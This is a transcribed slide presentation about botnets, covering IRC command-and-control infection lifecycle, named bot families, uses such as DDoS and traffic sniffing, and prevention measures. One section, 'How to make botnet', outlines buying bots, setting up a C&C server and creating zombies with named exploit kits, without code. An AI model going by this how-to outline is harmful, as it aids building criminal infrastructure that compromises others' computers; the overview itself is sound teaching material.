1 / 24

Topics to be covered

Topics to be covered. 1. What are bots,botnet ?. 2.How does it work?. 3.Types of botnets . 4.Prevention of botnet . What are bots,botnet ?. Bot a small program to remotely control a computer Botnet is a network of zombies, i.e. compromised computers under control of an attacker.

adonica
Télécharger la présentation

Topics to be covered

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Topics to be covered 1. What are bots,botnet? 2.How does it work? 3.Types of botnets. 4.Prevention of botnet.

  2. What are bots,botnet? • Bot a small program to remotely control a computer • Botnetis a network of zombies, i.e. compromised computers under control of an attacker.

  3. How does it work?

  4. In following picture [1] shows the life-cycle of a botnet infection and the contact with the botmaster: • Infection strategies used by the masters are often seen when examining other malware such as self-replicating worms, e-mail viruses, etc. but also can be spread by making a victim execute some form of malicious code on his machine. Many email attachments are simply these executable files.

  5. The next step taken by a new bot is to contact a DNS server for the resolving of the DNS name of the IRC server (the IRC server’s name is given in the executable and a DNS query is made to acquire the server’s IP address). This step allows the master to retain control of the net also if the IP address associated with the DNS name of the IRC server gets black-listed.

  6. The next step taken by a new bot is to contact a DNS server for the resolving of the DNS name of the IRC server (the IRC server’s name is given in the executable and a DNS query is made to acquire the server’s IP address). This step allows the master to retain control of the net also if the IP address associated with the DNS name of the IRC server gets black-listed.

  7. The fact that IRC channels allow several forms of communication as well as data dissemination and that many open-source implementations are available make this protocol just suitable for botmasters. • As the C&C channel is also specified in the binary, the bot can now establish an IRC connection with the server and join the given channel. For this purpose, three steps of authentication are required: first of all the bot authenticates itself to the server with the PASS message, then it also has to authenticate itself with a password, to the master in order to join the channel.

  8. Lastly the botmaster also needs to authenticate himself to the bot before being able to send any command. The first two aim to keep outsiders away from the C&C channel, and the last one prevents the bots from being overtaken by other masters.

  9. When the join has successfully occurred, the bot executes the channel’s topic, which contains the default commands that every bot has to execute. Often it occurs that all bots on the channel are able to hear every exchanged message and this characteristic is used on this paper for the acquisition of insider information. However, sometimes broadcasting is not allowed to prevent saturation.

  10. How to make botnet? • 3 things are required for it & they are: • bot:- a small program that can remotely perform certain functions.

  11. C&c server

  12. Network of zombies

  13. Step1: Where to find a bot • Find a script on the Internet & purchase a ready-to-go bot . • Prices vary from $5 to $1000 depending on the bot functionality. • Write yourself .

  14. step2: • C&C server • C&C server is simply a powerful computer which will give you direct access to zombies, or if needed will store stolen data. For example, to install IRC server

  15. Dedicated computer with installed software (fairly legal). • Buy a domain, since it should be set up as a web server Hosting - to make the server accessible from the Internet, it should be hosted by a hosting company.

  16. Step3: • Creating zombies • Purchase/rent a network of zombies & compromise computers yourself. • Using software packages such as Mpack, Icepack and WebAttacker,using your brains.

  17. Types of botnet • Agobot/Phatbot/Forbot/XtremBot:- • This is probably the best known bot. Currently, the AV vendor Sophos lists more than 500 known different versions of Agobot (Sophos virus analyses) and this number is steadily increasing. The bot itself is written in C++ with cross-platform capabilities and the source code is put under the GPL. .

  18. mIRC-based Bots - GT-Bots:- • We subsume all mIRC-based bots as GT-bots, since there are so many different versions of them that it is hard to get an overview of all forks. mIRC itself is a popular IRC client for Windows. GT is an abbreviation for Global Threat and this is the common name used for all mIRC-scripted bots.

  19. Kaiten:- • This bot lacks a spreader too, and is also written for Unix/Linux systems. The weak user authentication makes it very easy to hijack a botnet running with kaiten. The bot itself consists of just one file.

  20. Q8 Bots:- • Q8bot is a very small bot, consisting of only 926 lines of C-code. And it has one additional noteworthiness: It's written for Unix/Linux systems. It implements all common features of a bot: Dynamic updating via HTTP-downloads, various DDoS- attacks (e.g. SYN-flood and UDP-flood), execution of arbitrary commands, and many more.

  21. Uses of botnet • Often botnets are used for Distributed Denial-of-Service (ddos)attack. A DDoS attack is an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services by consumingthe bandwidth of the victim network.

  22. Sniffing Traffic:- • Bots can also use a packet sniffer to watch for interesting clear-text data passing by a compromised machine. The sniffers are mostly used to retrieve sensitive information like usernames and passwords. But the sniffed data can also contain other interesting information.

  23. Botnet prevention • Software defaults should be the most secure settings, not the least secure & implement intrusion prevention systems. Implement spam filtering (w/CBL) and antivirus. • Implement organizational firewall and content filtering. • Blackholebotnet controllers and phishing websites upon verification & send regular notifications to downstream customers of detected issues. • Implement detection and filtering mechanisms where/when feasible.

More Related